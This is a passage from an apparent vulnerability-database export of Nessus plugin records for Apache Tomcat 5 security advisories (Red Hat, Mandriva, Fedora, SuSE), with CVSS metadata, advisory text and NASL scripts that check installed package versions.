{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"rhns-app-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Satellite Server\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"tomcat5-5.0.30-0jpp_12rh\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:59:23", "description": "A number of vulnerabilities have been discovered in the Apache Tomcat server :\n\nThe default catalina.policy in the JULI logging component did not restrict certain permissions for web applications which could allow a remote attacker to modify logging configuration options and overwrite arbitrary files (CVE-2007-5342).\n\nA cross-site scripting vulnerability was found in the HttpServletResponse.sendError() method which could allow a remote attacker to inject arbitrary web script or HTML via forged HTTP headers (CVE-2008-1232).\n\nA cross-site scripting vulnerability was found in the host manager application that could allow a remote attacker to inject arbitrary web script or HTML via the hostname parameter (CVE-2008-1947).\n\nA traversal vulnerability was found when using a RequestDispatcher in combination with a servlet or JSP that could allow a remote attacker to utilize a specially crafted request parameter to access protected web resources (CVE-2008-2370).\n\nA traversal vulnerability was found when the 'allowLinking' and 'URIencoding' settings were actived which could allow a remote attacker to use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process (CVE-2008-2938).\n\nThe updated packages have been patched to correct these issues.", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : tomcat5 (MDVSA-2008:188)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5342", "CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat5", "p-cpe:/a:mandriva:linux:tomcat5-admin-webapps", "p-cpe:/a:mandriva:linux:tomcat5-common-lib", "p-cpe:/a:mandriva:linux:tomcat5-jasper", "p-cpe:/a:mandriva:linux:tomcat5-jasper-eclipse", "p-cpe:/a:mandriva:linux:tomcat5-jasper-javadoc", "p-cpe:/a:mandriva:linux:tomcat5-jsp-2.0-api", "p-cpe:/a:mandriva:linux:tomcat5-jsp-2.0-api-javadoc", "p-cpe:/a:mandriva:linux:tomcat5-server-lib", "p-cpe:/a:mandriva:linux:tomcat5-servlet-2.4-api", "p-cpe:/a:mandriva:linux:tomcat5-servlet-2.4-api-javadoc", "p-cpe:/a:mandriva:linux:tomcat5-webapps", "cpe:/o:mandriva:linux:2008.0", "cpe:/o:mandriva:linux:2008.1"], "id": "MANDRIVA_MDVSA-2008-188.NASL", "href": "https://www.tenable.com/plugins/nessus/36926", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:188. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36926);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-5342\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_xref(name:\"MDVSA\", value:\"2008:188\");\n\n script_name(english:\"Mandriva Linux Security Advisory : tomcat5 (MDVSA-2008:188)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been discovered in the Apache Tomcat\nserver :\n\nThe default catalina.policy in the JULI logging component did not\nrestrict certain permissions for web applications which could allow a\nremote attacker to modify logging configuration options and overwrite\narbitrary files (CVE-2007-5342).\n\nA cross-site scripting vulnerability was found in the\nHttpServletResponse.sendError() method which could allow a remote\nattacker to inject arbitrary web script or HTML via forged HTTP\nheaders (CVE-2008-1232).\n\nA cross-site scripting vulnerability was found in the host manager\napplication that could allow a remote attacker to inject arbitrary web\nscript or HTML via the hostname parameter (CVE-2008-1947).\n\nA traversal vulnerability was found when using a RequestDispatcher in\ncombination with a servlet or JSP that could allow a remote attacker\nto utilize a specially crafted request parameter to access protected\nweb resources (CVE-2008-2370).\n\nA traversal vulnerability was found when the 'allowLinking' and\n'URIencoding' settings were actived which could allow a remote\nattacker to use a UTF-8-encoded request to extend their privileges and\nobtain local files accessible to the Tomcat process (CVE-2008-2938).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-common-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-jasper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-jasper-eclipse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-jasper-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-jsp-2.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-jsp-2.0-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-server-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-servlet-2.4-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-servlet-2.4-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat5-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-01-11T14:41:10", "description": "- Mon Sep 15 2008 David Walluck <dwalluck at redhat.com> 0:5.5.27-0jpp.2\n\n - add commons-io symlink\n\n - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com> 0:5.5.27-0jpp.1\n\n - 5.5.27 Resolves: rhbz#456120 Resolves: rhbz#457934 Resolves: rhbz#446393 Resolves: rhbz#457597\n\n - Tue Feb 12 2008 Devrim GUNDUZ <devrim at commandprompt.com> 0:5.5.26-1jpp.2\n\n - Rebuilt\n\n - Fri Feb 8 2008 Devrim GUNDUZ <devrim at commandprompt.com> 0:5.5.26-1jpp.1\n\n - Update to new upstream version, which also fixes the following :\n\n - CVE-2007-5342\n\n - CVE-2007-5333\n\n - CVE-2007-5461\n\n - CVE-2007-6286\n\n - Removed patch20, now in upstream.\n\n - Sat Jan 5 2008 Devrim GUNDUZ <devrim at commandprompt.com> 0:5.5.25-2jpp.2\n\n - Fix for bz #153187\n\n - Fix init script for bz #380921\n\n - Fix tomcat5.conf and spec file for bz #253605\n\n - Fix for bz #426850\n\n - Fix for bz #312561\n\n - Fix init script, per bz #247077\n\n - Fix builds on alpha, per bz #253827\n\n - Thu Nov 15 2007 Devrim GUNDUZ <devrim at commandprompt.com> 0:5.5.25-1jpp.1\n\n - Updated to 5.5.25, to fix the following issues :\n\n - CVE-2007-1355\n\n - CVE-2007-3386\n\n - CVE-2007-3385\n\n - CVE-2007-3382\n\n - CVE-2007-2450, RH bugzilla #244808, #244810, #244812, #363081\n\n - CVE-2007-2449, RH bugzilla #244810, #244812, #244804, #363081\n\n - Applied patch(20) for RH bugzilla #333791, CVE-2007-5461\n\n - Applied patch(21) for RH bugzilla #244803, #244812, #363081, CVE-2007-1358\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2008-09-17T00:00:00", "type": "nessus", "title": "Fedora 8 : tomcat5-5.5.27-0jpp.2.fc8 (2008-8130)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1355", "CVE-2007-1358", "CVE-2007-2449", "CVE-2007-2450", "CVE-2007-3382", "CVE-2007-3385", "CVE-2007-3386", "CVE-2007-5333", "CVE-2007-5342", "CVE-2007-5461", "CVE-2007-6286", "CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tomcat5", "cpe:/o:fedoraproject:fedora:8"], "id": "FEDORA_2008-8130.NASL", "href": "https://www.tenable.com/plugins/nessus/34227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8130.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34227);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"FEDORA\", value:\"2008-8130\");\n\n script_name(english:\"Fedora 8 : tomcat5-5.5.27-0jpp.2.fc8 (2008-8130)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com>\n 0:5.5.27-0jpp.2\n\n - add commons-io symlink\n\n - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com>\n 0:5.5.27-0jpp.1\n\n - 5.5.27 Resolves: rhbz#456120 Resolves: rhbz#457934\n Resolves: rhbz#446393 Resolves: rhbz#457597\n\n - Tue Feb 12 2008 Devrim GUNDUZ <devrim at\n commandprompt.com> 0:5.5.26-1jpp.2\n\n - Rebuilt\n\n - Fri Feb 8 2008 Devrim GUNDUZ <devrim at\n commandprompt.com> 0:5.5.26-1jpp.1\n\n - Update to new upstream version, which also fixes the\n following :\n\n - CVE-2007-5342\n\n - CVE-2007-5333\n\n - CVE-2007-5461\n\n - CVE-2007-6286\n\n - Removed patch20, now in upstream.\n\n - Sat Jan 5 2008 Devrim GUNDUZ <devrim at\n commandprompt.com> 0:5.5.25-2jpp.2\n\n - Fix for bz #153187\n\n - Fix init script for bz #380921\n\n - Fix tomcat5.conf and spec file for bz #253605\n\n - Fix for bz #426850\n\n - Fix for bz #312561\n\n - Fix init script, per bz #247077\n\n - Fix builds on alpha, per bz #253827\n\n - Thu Nov 15 2007 Devrim GUNDUZ <devrim at\n commandprompt.com> 0:5.5.25-1jpp.1\n\n - Updated to 5.5.25, to fix the following issues :\n\n - CVE-2007-1355\n\n - CVE-2007-3386\n\n - CVE-2007-3385\n\n - CVE-2007-3382\n\n - CVE-2007-2450, RH bugzilla #244808, #244810, #244812,\n #363081\n\n - CVE-2007-2449, RH bugzilla #244810, #244812, #244804,\n #363081\n\n - Applied patch(20) for RH bugzilla #333791,\n CVE-2007-5461\n\n - Applied patch(21) for RH bugzilla #244803, #244812,\n #363081, CVE-2007-1358\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=446393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457934\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014420.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?09205e05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat5 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"tomcat5-5.5.27-0jpp.2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:10:34", "description": "Websphere has been updated to version 2.1.0.1 to fix several security vulnerabilities in the included subprojects, such as Apache Geronimo and Tomcat. (CVE-2007-0184 / CVE-2007-0185 / CVE-2007-2377 / CVE-2007-2449 / CVE-2007-2450 / CVE-2007-3382 / CVE-2007-3385 / CVE-2007-3386 / CVE-2007-5333 / CVE-2007-5342 / CVE-2007-5461 / CVE-2007-5613 / CVE-2007-5615 / CVE-2007-6286 / CVE-2008-0002 / CVE-2008-1232 / CVE-2008-1947 / CVE-2008-2370 / CVE-2008-2938)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Websphere Community Edition (ZYPP Patch Number 5850)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0184", "CVE-2007-0185", "CVE-2007-2377", "CVE-2007-2449", "CVE-2007-2450", "CVE-2007-3382", "CVE-2007-3385", "CVE-2007-3386", "CVE-2007-5333", "CVE-2007-5342", "CVE-2007-5461", "CVE-2007-5613", "CVE-2007-5615", "CVE-2007-6286", "CVE-2008-0002", "CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WEBSPHERE-AS_CE-5850.NASL", "href": "https://www.tenable.com/plugins/nessus/41596", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41596);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0184\", \"CVE-2007-0185\", \"CVE-2007-2377\", \"CVE-2007-2449\", \"CVE-2007-2450\", \"CVE-2007-3382\", \"CVE-2007-3385\", \"CVE-2007-3386\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2007-5613\", \"CVE-2007-5615\", \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n\n script_name(english:\"SuSE 10 Security Update : Websphere Community Edition (ZYPP Patch Number 5850)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Websphere has been updated to version 2.1.0.1 to fix several security\nvulnerabilities in the included subprojects, such as Apache Geronimo\nand Tomcat. (CVE-2007-0184 / CVE-2007-0185 / CVE-2007-2377 /\nCVE-2007-2449 / CVE-2007-2450 / CVE-2007-3382 / CVE-2007-3385 /\nCVE-2007-3386 / CVE-2007-5333 / CVE-2007-5342 / CVE-2007-5461 /\nCVE-2007-5613 / CVE-2007-5615 / CVE-2007-6286 / CVE-2008-0002 /\nCVE-2008-1232 / CVE-2008-1947 / CVE-2008-2370 / CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0184.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0185.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2377.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2449.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2450.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3382.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3385.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3386.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5333.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5461.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5613.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5615.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-6286.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1232.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1947.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2370.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2938.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5850.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79, 94, 200, 264);\n\n 